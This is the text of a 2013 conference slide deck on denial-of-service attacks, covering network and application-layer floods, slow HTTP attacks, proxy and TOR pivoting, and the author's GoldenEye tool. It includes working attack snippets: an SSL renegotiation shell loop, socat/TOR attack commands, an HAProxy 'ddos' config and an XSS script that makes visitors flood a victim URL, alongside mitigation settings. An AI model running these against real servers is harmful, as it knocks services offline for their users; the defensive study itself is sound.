Super Effective Denial of Service Attacks

super effective

denial of service
attacks

Jan Seidl

$ whoami
Full Name: Jan
Origin: Rio de

Seidl
Janeiro, RJ – Brazil

Work:
● Technical Coordinator @ TI Safe
●
● OpenSource contributor for: PEV, Logstash
●
● Codes and snippets @ github.com/jseidl
●
Features:
● UNIX Evangelist/Addict/Freak (but no fanboy!)
●
● Python and C lover
●
● Coffee dependent
●
● Hates printers and social networks
●
● Proud DC Labs Member
●
Super Effective Denial-of-Service Attacks. SEIDL, Jan
Latinoware/2013 – Foz do Iguaçú, Brazil

agenda
0x0
0x1
0x2
0x3
0x4
0x5
0x6
0x7
0x8
0x9
0xA

Introduction to Denial-of-Service
Background: Layer 3 attacks
Attacking Layer 7: Fundamentals
Attacking Layer 7: Vectors & Tools
WebServer DoS Mitigation 101
Proxies (SOCKS/TOR) and Layer 7 attacks
Jericho Attack Technique: Load-balancing attacks
XSS D/DoS
Size doesn't matter: Mobile-launched Denial-of-Service
Demo/Video: GoldenEye MdoS Android Tool
Questions?



What is denial of service?


What is denial of service?

A denial-of-service attack (...), is an attempt to
make a machine or network resource
unavailable to its intended users.

Source: Wikipedia/en_US


Result?


Symptoms
Oddly low performance
Unavailability of given resource
Unavailability of all resources



Recent Cases



http://money.cnn.com/2012/09/27/technology/bank-cyberattacks/index.html


http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-victim-in-series-of-attacks/



http://nakedsecurity.sophos.com/2012/04/07/anonymous-attacks-home-office/


http://usatoday30.usatoday.com/tech/news/story/2012-07-19/hactivism-anonymous-attacks/56464792/1



http://olhardigital.uol.com.br/negocios/digital_news/noticias/ataques-ddos-cresceram-70-em-2012,-dizpesquisa

Targets (OSI layer)

Network (Layer 3)

Bandwidth consumption

Application (Layer 7)

Application or operating system resources consumption



Network (Layer 3)

Bandwidth consumption


Popular Attacks
Ping Flood

(…) is a simple denial-of-service attack where the attacker
overwhelms the victim with ICMP Echo Request (ping)
packets (...) The attacker hopes that the victim will respond
with ICMP Echo Reply packets, thus consuming both
outgoing bandwidth as well as incoming bandwidth.
Source: Wikipedia/en_US


Popular Attacks
Smurf Attack


Popular Attacks
SYN Flood


Popular Attacks
Teardrop Attack

“When the sum of the offset and size of one fragmented
packet differ from that of the next fragmented packet, the
packets overlap, and the server attempting to reassemble
the packet can crash, especially if it is running an older
operating system that has this vulnerability.”
http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html

Popular Attacks
Teardrop Attack



Application (Layer 7)

Application or operating system resources consumption


Focus

Layer 3

Layer 7

Exhaust
bandwidth

Exhaust application or
operating system keyresources


Stealthness
Layer 3

Layer 7

High network noise
(noisy attack)

Low network noise, might
emulate legit requests


Efficiency
Layer 3

Layer 7

Requires lot of participants
for significant outage. May
be blocking by sparring

Sometimes only one
machine can cause damage.
Difficult to block


Mitigation
Layer 3

Layer 7

Large link, connectionlimiting, rate-limiting,
sparring

?


Layer 7 attacks targets
Intense CPU, Disk I/O & Swapping operations,
long/slow/complex queries

Finite application resources: Maximum Sockets Limits, Maximum
Memory Limits, Disk space etc


Intense CPU usage
SSL Renegotiation / SSL Handshake Attack

15% more processing power needed on server
than on client to establish handshake.
On the wild since 2003.
Still affects most implementations.
Found by THC group (ww.thc.org) in 2011


Intense CPU usage
Tool:
THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/>
- or thcssldosit() { while :; do (while :; do echo R;
done) | openssl s_client connect 127.0.0.1:443
2>/dev/null; done }
for x in `seq 1 100`; do thcssldosit & done


Intense CPU usage
Affects any TLS/SSL secured protocol:
HTTPS, SMTPS, POP3S, Database secure ports etc
Mitigation?
Turning off SSL renegotiation might help, but not solve
SSL accelerators might help, but also don't 100% solve
IPTables mitigation
http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html

Intense CPU usage
Apache Range Header Attack
Parallel requests of small GZIP'ed content parts
Forces the webserver to perform several parallel compression
operations = high load
Discovered in 2011 (CVE-2011-3192)


Intense CPU usage
Tools:
killapache.pl <
http://seclists.org/fulldisclosure/2011/Aug/175>
Slowhttptest <http://code.google.com/p/slowhttptest/>


Intense CPU usage
Mitigation:
SetEnvIf or mod_rewrite
(ref: http://httpd.apache.org/security/CVE-2011-3192.txt)
Use a WAF (Web Application Firewall)
Update Apache to version 2.2.21 or greater


Connection slots abuse
HTTP Slow Attacks
Slow Headers, Slow Post, Slow Read
Read or send data in small chunks, with interval
between reads / writes.
Waiting for the full request is part of the Web Server's
nature


HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
Slow Post: send request post body (post data) 'Slowly'
Slow Read: Small TCP window size to force slow response
reading


HTTP Slow Attacks
Slow Headers: send request headers 'Slowly'
GET / HTTP/1.1 rn /* sleep(1) */
Connection: keep-alive rn /* sleep(1) */
...


HTTP Slow Attacks
Slow Post: send request post body (post data) 'Slowly'
Content-Type: application/x-www-form-urlencoded
Content-Length: 512
Accept: text/html;q=0.9,text/plain;q=0.8
foo=bar /* sleep(1) */
bar=baz /* sleep(1) */
baz=foo /* sleep(1) */
...


HTTP Slow Attacks
Slow Read: Small TCP window size to force slow response
reading
/* pseudocode */
int len = 1;
while (data = read(sock, buffer, len)) {
sleep(5);
…
}


HTTP Slow Attacks
Tools:
Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post
Tool
Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool
Slow Read: slowhttptest


HTTP Slow Attacks - Mitigation:
Slow Headers: request timeout (apache's
mod_reqtimeout), WAF
Slow Post: request timeout, WAF
Slow Read: Disable pipelining and oddly slow window sizes,
limit maximum request request time, WAF
Good article on slow attacks mitigation
https://community.qualys.com/blogs/securitylabs/2011/11/02
/how-to-protect-against-slow-http-attacks

HTTP KeepAlive + NoCache
Keep connections open and force cache regeneration.
First POC:
HULK – HTTP Unbearable Load King
Created on May 2012 by Barry Shteiman.
<http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/>


HTTP KeepAlive + NoCache: HULK

Highly effective against IIS, Apache & Reverse Proxies
Caveat: Python, Urllib2 → Always sends headers on the
same order
Spiderlabs: modsecurity rule to mitigate URLLib attacks (Hulk)
(http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html)

Randomization FTW!


HTTP KeepAlive + NoCache + Randomness: GoldenEye
●
●

●
●

Author: Me! :)

Initially born as a Hulk fork due to its fingerprinting weakness
●
●

Transformed further into a new independent HTTP DoS Tool

Born to test WAF blocking abilities under random and semi-natural
payloads
Available at https://github.com/jseidl/GoldenEye


HTTP KeepAlive + NoCache + Randomness: GoldenEye
Main Features:
GET, POST or Random HTTP methods
Random headers quantity
Random Headers content with legit values as per RFC
Better random block function to avoid fingerprinting


Hackers to Hackers Conference 2012 – São Paulo, Brasil

Mitigation
Granular page permissions
Filter POST where not needed
Filter querystring parameters where not needed
ProxyCache
Use caching proxies (ex: Varnish) and disable cache reload
KeepAlive e TimeOuts
Tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and
equivalent in other webservers


Apache

LimitRequestFields, LimitRequestFieldSize,
LimitRequestBody, LimitRequestLine,
LimitXMLRequestBody, TimeOut,
KeepAliveTimeOut, ListenBackLog,
MaxRequestWorkers [core]
RequestReadTimeout [mod_reqtimeout]
Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks

Nginx

client_max_body_size, client_body_buffer_size,
client_header_buffer_size,
large_client_header_buffers, client_body_timeout,
client_header_timeout [core]
Modules: HttpLimitReqModule,
HttpLimitZoneModule


IIS 6 & 7
IIS 6: connectionTimeout, HeaderWaitTimeout,
MaxConnections
IIS 7: <RequestLimits> maxAllowedContentLength,
maxQueryString, maxUrl
<headerLimits>
<Limits>/<WebLimits> connectionTimeout,
headerWaitTimeout, minBytesPerSecond

USE A WEB APPLICATION FIREWALL (WAF)

Modsecurity (Apache / Nginx)
http://www.modsecurity.org/

NAXSI (Nginx)
http://code.google.com/p/naxsi/

Proxies and Layer 7 attacks


Layer 3

Layer 7

Bad to attack through
proxies as they usually
have low bandwidth and
you might get banned
from them

Requires low bandwidth
Low network noise
Not degraded by low
output


Why use proxies in HTTP attacks?

Simple answer






Geographic location at your will






Different source IPs

Can provide high anonymity

Largely available on the internet


Attack pivoting by proxies
Tool:
Socat: Multipurpose Relay
http://www.dest-unreach.org/socat/
Also with SSL support:
HTTPS, IMAPS, POPS, LDAPS


Attack pivoting by proxies: Regular Proxies
# socat TCP4LISTEN:80
PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>
# echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php t 1000
m get


Attack pivoting by proxies: TOR
# socat TCP4LISTEN:80,fork
SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052
# echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts
# ./goldeneye.py http://<VICTIM_HOST>/index.php t 1000
m get


Bônus: Multi-TOR
The TOR client supports spawning as many instances and
opening as many circuits as necessary.
tor RunAsDaemon 1 CookieAuthentication 0
HashedControlPassword "pwd" ControlPort 4444
PidFile torN.pid SocksPort 5090 DataDirectory
data/torN
Tool:
Multi-TOR
https://github.com/jseidl/Multi-TOR/
EX: ./multi-tor.sh 5 # Opens 5 TOR instances

Mitigating TOR with TORBlock
Blocking TOR-sourced access
TORBlock: IPTables-based blocking
Tool:
https://github.com/jseidl/torblock


Load Balancing Attacks
Meet Jericho


Starring: HAProxy
“The Reliable, High Performance TCP/HTTP Load Balancer”
REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C }


'Load-balanced' attacks anatomy
Attacker:
1. Open lots of socat tunnels to the victim, each one
from a different proxy (regular, TOR or both)
2. Put local port addresses (socat'ed ones) on
HAProxy
3. Place victim's domain on /etc/hosts
4. Attack normally from your favorite tool


listen ddos 0.0.0.0:80
mode tcp
balance roundrobin
server inst1 localhost:8080
…


Proxy 1
Proxy 2
Attacker

HAProxy

Proxy 3
Proxy 4

Victim

Proxy 5
Proxy 6
Proxy 7


Dangers of 'load-balanced' attacks?
●
●

Bypass connection-limiting
●
●

●
●

●
●

DoS → DDoS

Mutiple origin IPs

Origins can be from multiple countries


Dangers of 'load-balanced' attacks?


More about the Jericho Attack Technique

http://www.slideshare.net/jseidl/slides-the-jerichoattackperspective

XSS D/DoS
What if an XSS flaw could turn your visitors into D/DoS
clients?
<script>
function DDoS() {
a = new Date()
unixepoch = a.getTime()

}

elm = document.createElement("img")
victimURL = "http://10.1.1.114/"
elm.src = victimURL+"?"+unixepoch

setInterval("DDoS()",1);
</script>


Mobile-launched Denial-of-Service
PoC Tool: GoldenEye Mobile


Objective
Test if mobile devices alone could conduct a successful DoS
attack.
Test if equipment and configurations are able to deter DoS
attacks from mobile platforms.


Android: Limitations
Max 128 threads (Android 2.1)
Maximum number of concurrent sockets per thread: 30 (>30
too many open files)

Can we get better results if device is 'rooted'
(sysctl) ?


Firepower
5 min test on an Apache webserver, default
configuration, in a Debian 6 virtual
machine, also with default configuration.
CPU Usage: u5.85 s4.52 cu0 cs0 2.37% CPU
load

Low CPU fingerprint

Server overloaded
(a.k.a. down)

https://github.com/jseidl/GoldenEye-Mobile

GoldenEye Mobile: Mitigation
GoldenEye Mobile uses HEAD method for maximum speed.
Easily blocked (Module: Mod_Rewrite)
RewriteEngine on
RewriteCond %{THE_REQUEST} !^(GET|POST) /.* HTTP/1.1$
RewriteRule .* [F]
mod_security
SecFilterSelective REQUEST_METHOD "!^(GET|POST)$" "deny,auditlog,status:405"


Demo: DoS Fun
GoldenEye Mobile DoS Android Tool Demo!

http://bit.ly/GoldenEyeMDOS

Questions?


Thanks!
– To Peace!


Thanks!
Thanks for your time!
jseidl@wroot.org / http://wroot.org
https://github.com/jseidl
http://www.slideshare.net/jseidl
@jseidl


Super Effective Denial of Service Attacks

Recommended

Recommended

More Related Content

Similar to Super Effective Denial of Service Attacks

Similar to Super Effective Denial of Service Attacks (20)

Recently uploaded

Recently uploaded (20)

Super Effective Denial of Service Attacks

Editor's Notes